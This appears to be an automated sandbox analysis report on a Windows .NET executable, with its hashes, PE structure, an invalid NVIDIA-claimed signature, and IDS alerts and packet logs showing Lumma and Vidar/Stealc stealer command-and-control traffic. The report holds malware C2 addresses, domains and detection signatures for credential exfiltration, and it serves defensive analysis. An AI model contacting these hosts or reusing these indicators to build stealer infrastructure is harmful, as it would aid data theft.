                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"..cU..................................................................................................................................................................................................................................................................................................................................................W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.96252869693466
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:file.exe
                                                      File size:196'648 bytes
                                                      MD5:5095864caf019967467c5714897ee419
                                                      SHA1:17e649d5784db18d790c77bdd300b9ff73dbf5ea
                                                      SHA256:26047c08e200668e57088cb5b9577ed7975bf6309db51fe3544c54878430e8a3
                                                      SHA512:4949ae58c3b91a7378b13adf60bb13d0c769934f5de42b1a89458cc558b605a2672b2f9855558455fad4d584881ede4f6dfd26dbc77a2f8501acbd8585825ff6
                                                      SSDEEP:3072:YWP9anIHyke/cUcqFlXghqdNBS1EHuJh35P76S+tQnZgnXx1ULCFINKn5v/BFjk3:RUIHykUvon1EHOh3h67ysXxDCNK5XmEO
                                                      TLSH:3A141220474C6D28FFAF49F19C5680667578F5A673E388E620E2E3378B9D340718667B
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@......c.....`................................

                                                      File Icon

                                                      Icon Hash:90cececece8e8eb0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x42edae
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows cui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x66D0CD0B [Thu Aug 29 19:33:31 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 13/01/2023 00:00:00 16/01/2026 23:59:59
                                                      Subject Chain
                                                      • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                      Version:3
                                                      Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                      Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                      Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                      Serial:0997C56CAA59055394D9A9CDB8BEEB56

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2ed580x53.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000x62e.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x2da000x2628
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x2ec200x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x2cdb40x2ce00714610eeb49a5acb4be6d46ea1124430False0.988874260097493data7.988086899463732IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x300000x62e0x800d3770ac80278a4b67e8f751a4aa3a218False0.36181640625data3.581893877838618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x320000xc0x200980efd29c3b4ffaa5bf951273264b391False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0x300a00x3a4dataEnglishUnited States0.4667381974248927
                                                      RT_MANIFEST0x304440x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                      2024-08-29T22:52:39.429665+0200TCP2055493ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)149743443192.168.2.4188.114.96.3
                                                      2024-08-29T22:52:37.402398+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34974080192.168.2.4147.45.44.104
                                                      2024-08-29T22:53:04.539187+0200TCP2044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config18049751147.45.68.138192.168.2.4
                                                      2024-08-29T22:52:35.838282+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34974080192.168.2.4147.45.44.104
                                                      2024-08-29T22:52:40.814775+0200TCP2049812ET MALWARE Lumma Stealer Related Activity M2149745443192.168.2.4188.114.96.3
                                                      2024-08-29T22:52:40.814775+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149745443192.168.2.4188.114.96.3
                                                      2024-08-29T22:52:37.972831+0200UDP2055479ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)15577553192.168.2.41.1.1.1
                                                      2024-08-29T22:52:37.104391+0200TCP2055576ET MALWARE Observed Lumma Stealer Related Domain (awwardwiqi .shop in TLS SNI)149741443192.168.2.4188.114.97.3
                                                      2024-08-29T22:52:37.966810+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149741443192.168.2.4188.114.97.3
                                                      2024-08-29T22:52:37.966810+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149741443192.168.2.4188.114.97.3
                                                      2024-08-29T22:52:20.001776+0200TCP2051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M118049739147.45.68.138192.168.2.4
                                                      2024-08-29T22:52:40.804435+0200TCP2054495ET MALWARE Vidar Stealer Form Exfil14974480192.168.2.495.164.119.162
                                                      2024-08-29T22:52:38.454050+0200TCP2055489ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)149742443192.168.2.4188.114.97.3
                                                      2024-08-29T22:52:18.234088+0200TCP2049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST14973980192.168.2.4147.45.68.138
                                                      2024-08-29T22:52:36.606887+0200UDP2055575ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (awwardwiqi .shop)15657653192.168.2.41.1.1.1
                                                      2024-08-29T22:52:38.932371+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149742443192.168.2.4188.114.97.3
                                                      2024-08-29T22:52:38.932371+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149742443192.168.2.4188.114.97.3
                                                      2024-08-29T22:52:40.279529+0200TCP2055493ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)149745443192.168.2.4188.114.96.3
                                                      2024-08-29T22:53:05.339057+0200TCP2051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M118049751147.45.68.138192.168.2.4
                                                      2024-08-29T22:52:18.971347+0200TCP2044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config18049739147.45.68.138192.168.2.4
                                                      2024-08-29T22:52:38.934043+0200UDP2055483ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)16414753192.168.2.41.1.1.1
                                                      2024-08-29T22:52:39.563642+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149743443192.168.2.4188.114.96.3
                                                      2024-08-29T22:52:39.563642+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149743443192.168.2.4188.114.96.3

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 29, 2024 22:52:16.218596935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:16.223385096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:16.223475933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:16.223634005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:16.228441000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:17.133261919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:17.133321047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:17.154110909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:17.158988953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:17.692980051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:17.693034887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:17.694446087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:17.699266911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.234009981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.234087944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.234457016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.234500885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.320589066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.320642948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.321846962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.326666117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.878807068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.878822088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.878830910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.878865004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.878897905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.883162022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.883183956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.883192062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.883208036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.883222103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.965337038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:18.965411901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.966561079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:18.971347094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:19.513262033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:19.513325930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:19.996917009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:19.996962070 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.001775980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.001799107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.001893997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.001904964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.002043009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.002051115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.002058983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.679841995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.679919004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.681724072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.686558962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.867394924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.867412090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.867423058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.867465973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.867500067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.873573065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.873590946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.873600006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.873625994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.873644114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.879765034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.879776001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.879784107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.879807949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.879837036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.886322021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.886364937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.886373997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.886383057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.886394024 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.886406898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.892735958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.892750978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.892760038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.892791033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.892807007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.898804903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.898825884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.898833990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.898871899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.898895025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.905569077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.905579090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.905586958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.905627012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.911679029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.911727905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.911784887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.911793947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.911834002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.917722940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.917782068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.917782068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.917814970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.953978062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.954060078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.954062939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.954094887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.960530996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.960557938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.960591078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.960601091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.960635900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.960668087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.966768980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.966847897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.966857910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.966898918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.972934008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.972971916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.973018885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.973092079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.973126888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.979402065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.979428053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.979439020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.979473114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.979485989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.985631943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.985722065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.985735893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.985788107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.992290974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.992316008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.992325068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.992363930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.992384911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.998347998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.998398066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.998444080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:20.998469114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:20.998505116 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.004898071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.004908085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.004916906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.004966021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.010844946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.010869026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.010878086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.010904074 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.010919094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.017071009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.017087936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.017096043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.017133951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.017159939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.022829056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.022931099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.022969007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.022978067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.023000956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.027856112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.027879953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.027900934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.027920008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.027940035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.033601046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.033647060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.033655882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.033689976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.039180040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.039191961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.039206028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.039230108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.039254904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.044632912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.044642925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.044689894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.044712067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.044751883 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.050642014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.050654888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.050663948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.050693989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.050712109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.056184053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.056222916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.056231976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.056232929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.056266069 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.060019970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.060029984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.060039997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.060074091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.060086012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.063224077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.063389063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.063401937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.063441992 CEST4973980192.168.2.4147.45.68.138
